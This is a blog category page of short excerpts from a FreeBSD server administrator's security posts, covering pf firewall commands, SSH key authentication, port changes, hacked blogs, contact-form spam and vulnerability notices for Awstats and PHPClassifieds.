Home > Security

Posts in Security

Frequently used pf commands

November 9, 2013 Posted in Security

For my own convenience due to bad memory: (valid only with this article)

// Add or remove IP/subnet
# pfctl -t blockedips -T add
# pfctl -t blockedips -T delete

// Flush all NAT, filter, state, and table rules and reload /etc/pf.conf.
# pfctl -F all -f /etc/pf.conf

// View all IP address listed in tables
# pfctl -t blockedips -T show

// View statistics for each IP/CIDR
# pfctl -t blockedips -T show -v

How to Setup Key Based Authentication in SSH

March 8, 2011 Posted in Security

This is for Windows client, please refer to this page for FreeBSD workstation.

Key Based Authentication, step by step

1. Download PuTTYgen (on Windows), generate private/public key pair.
Read More

Welcome to Nginx! What’s This?

July 23, 2010 Posted in Security

When I visited one of my sites, I got a page with only the bold and big text:

Welcome to Nginx!

It looked like my site was hacked, actually I was pretty sure about it at that moment. I almost wanted to roll out my backup, fortunately it’s back to normal 20 minutes later, then I thought it might be my computer’s problem. After some digging, it turned out to be my ISP’s problem, somehow my ISP treated my site as an invalid domain and displayed their own search engine (evil), but their own site didn’t work, hence the default page from their proxy server.

Key Based Authentication in SSH

March 5, 2010 Posted in Security

I just changed my SSH authentication from password to key-based. If you are using password authentication, I strongly suggest you change it, it’s a must, the setup is also very easy, there is no any reasons you don’t do this. With all kinds of buggy programs and scripts, our servers are much much weaker than we thought.

Edit: Wrote a step by step guide for easy reference.

Urgent Security Warning for WordPress

September 5, 2009 Posted in Security

I just found that my two wordpress blogs were hacked, the permanent link structure was changed to:


This caused the individual posts couldn’t be accessed.

I don’t know how this was hacked, and what other damages were caused. For now, a urgent solution would be protecting wp-admin directory.

I have seen some other hacked blogs, I strongly suggest you take actions immediately. The above might not be a good solution, but should be helpful.

Scary Moment

March 30, 2009 Posted in Security

When I was restarting Apache after installed a new PHP module, I found that httpd.conf was missing, that was scary! I have absolutely no idea how this happened, the only possible reason is that I deleted it by accident. Read More

Another Hack on Third-party Script

November 22, 2008 Posted in Security

PHPClassifieds 7.5 has a SQL injection vulnerability, the detailed how-to was posted publicly, which caused many classifieds websites hacked. The fix is here. Read More

Change FTP Port

December 31, 2005 Posted in FTP, Security

After I changed the ssh port, combined with the changes of net.inet.tcp.blackhole and net.inet.udp.blackhole, now the server is completely free of ssh login attempts. I realized these two changes should be made together, it doesn’t make much sense to change only one of them. For example, if only change the port, the server will still respond to the port scan, it very probably gets more scan activity. What if only changed the system varibles? Since the ports of common services are the main target, the evil people still can easily find the ports to attack. Read More

Change sshd Port

December 26, 2005 Posted in Security

I used default port number 22 for sshd, the server got lots of login attempts every day which left thousands of lines in daily security run output. Read More

Security Discussion

November 21, 2005 Posted in Security

On the FreeBSD security mailing list, there is a post about a compromised box which got many interesting replies: Need urgent help regarding security

Contact Form Abused Through BCC Field

November 16, 2005 Posted in Security

A simple contact form on my website was abused to send spams. I received weird messages sent from the contact form in the past two weeks, I thought it was just from some boring persons, and didn’t pay attention to it until I got some messages bounced back from other servers. After checked the mail queue, I was shocked that there were still a few emails with a very long recipient list.

Here is my original code:
Read More

No. 1 Keyword Referrer “phpBB Hack”

November 5, 2005 Posted in Security

Google seems to like this blog a lot, new posts were picked up and ranked in the top 10 within a couple of days…simply amazing to me. Although this blog has quite a few keywords with great ranking such as “FreeBSD server”, the most searched term is “phpBB hack”. Several visitors even came here with “how to hack phpBB”. Read More

Chkrootkit 0.46 Problem

October 30, 2005 Posted in Security

Cordeiro posted the following message on the FreeBSD security list. I didn’t test it (I don’t have testing server).

…don’t use chkrootkit 0.46 on production machines.
The “chkproc” process sends a SIGXFSZ (25) signal to init,
that interprets this signal as a “disaster” and reboots
after a 30s sleep.

I tested chkrootkit(0.45) and Rootkit Hunter before. I prefer Rootkit Hunter.

Rootkit Hunter – Another Root Kits Checking Tool

August 17, 2005 Posted in Security

I have tried chkrootkit, and I think it’s a very good tool. The book “Mastering FreeBSD and OpenBSD Security”, a security bible to me, only mentioned Rootkit Hunter, so I decide to give it a try. Read More

Arbitrary Code Execution Vulnerability in Awstats 6.4

August 16, 2005 Posted in Security

There is a new vulnerability in Awstats 6.4, detailed explanation is here. The new development version 6.5 has addressed this issue, but not available yet in ports. Awstats 6.4 has been marked forbidden in the ports, “make install” will display the following message, which is different from the portaudit error: Read More

« Older Entries